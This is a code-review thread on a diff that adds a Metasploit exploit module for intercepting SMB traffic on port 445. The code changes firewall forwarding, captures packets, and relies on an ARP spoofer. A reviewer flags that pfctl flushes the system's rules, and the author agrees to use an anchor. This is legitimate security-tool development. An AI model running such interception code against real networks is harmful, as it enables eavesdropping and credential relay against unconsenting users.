modules/exploits/windows/smb/smb_shadow.rb

```diff
@@ -0,0 +1,720 @@
+        OptString.new('DisableFwd', [true, 'Disable packet forwarding on port 445', true])
+        # For future cross LAN work:
+        # OptString.new('GATEWAY',  [ true, "The network gateway ip address" ])
+      ]
+    )
+
+    deregister_options('SNAPLEN', 'FILTER', 'PCAPFILE', 'RHOST', 'SECRET', 'GATEWAY_PROBE_HOST', 'GATEWAY_PROBE_PORT',
+                       'TIMEOUT')
+  end
+
+  def exploit
+    if datastore['DefangedMode'].to_s == 'true'
+      warning = <<~EOF
+
+        Are you SURE you want to modify your port forwarding tables?
+        You MAY contaminate your current network configuration.
+
+        Disable the DefangedMode option if you wish to proceed.
+      EOF
+      fail_with(Failure::BadConfig, warning)
+    end
+    print_good('INFO : Warming up...')
+    print_error('WARNING : Not running as Root. This can cause socket permission issues.') unless Process.uid == 0
+    @sessions = {}
+    @mutex = Mutex.new
+    @main_threads = []
+    @interface = datastore['INTERFACE'] # || Pcap.lookupdev
+    unless Socket.getifaddrs.map(&:name).include? @interface
+      fail_with(Failure::BadConfig,
+                "Interface not found: #{@interface}")
+    end
+    @ip4 = ipv4_addresses[@interface]&.first
+    fail_with(Failure::BadConfig, "Interface does not have address: #{@interface}") unless @ip4&.count('.') == 3
+    @mac = get_mac(@interface)
+    fail_with(Failure::BadConfig, "Interface does not have mac: #{@interface}") unless @mac && @mac.instance_of?(String)
+    # For future cross LAN work: (Gateway is required.)
+    # @gateip4 = datastore['GATEWAY']
+    # fail_with(Failure::BadConfig, "Invalid Gateway ip address: #{@gateip4}") unless @gateip4&.count(".") == 3
+    # @gatemac = arp(tpa: @gateip4)
+    # fail_with(Failure::BadConfig, "Unable to retrieve Gateway mac address: #{@gateip4}") unless @gatemac && @gatemac.class == String
+    @share = datastore['SHARE']
+    print_status("Self: #{@ip4} | #{@mac}")
+    # print_status("Gateway: #{@gateip4} | #{@gatemac}")
+    disable_p445_fwrd
+    start_syn_capture
+    start_ack_capture
+    print_status('INFO : This module must be run alongside an arp spoofer / poisoner.')
+    print_status('INFO : The arp spoofer used during the testing of this module is bettercap v1.6.2.')
+    main_capture
+  ensure
+    cleanup
+  end
+
+  # This prevents the TCP SYN on port 445 from passing through the filter.
+  # This allows us to have the time to modify the packets before forwarding them.
+  def disable_p445_fwrd
+    if datastore['DisableFwd'] == 'false'
+      print_status('DisableFwd was set to false.')
+      print_status('Packet forwarding on port 445 will not be disabled.')
+      return true
+    end
+    if RUBY_PLATFORM.include?('darwin')
+      pfctl = Rex::FileUtils.find_full_path('pfctl')
+      unless pfctl
+        fail_with(Failure::NotFound, 'The pfctl executable could not be found.')
+      end
+      IO.popen("#{pfctl} -f -", 'r+', err: '/dev/null') do |pf|
```

Comment:
Apparently, using `-f` flushes the existing rules before adding this new rule. This is the warning I had on Mac OS X:
```
pfctl: Use of -f option, could result in flushing of rules
present in the main ruleset added by the system at startup.
See /etc/pf.conf for further details.
...
```
I checked and confirmed the original rules were gone.

Whenever possible, we need to make sure the packet filter behavior remains the same and only the needed rule should be added.

Reply:
I will use a [packet filter anchor](https://www.openbsd.org/faq/pf/anchors.html) to make sure the changes are isolated.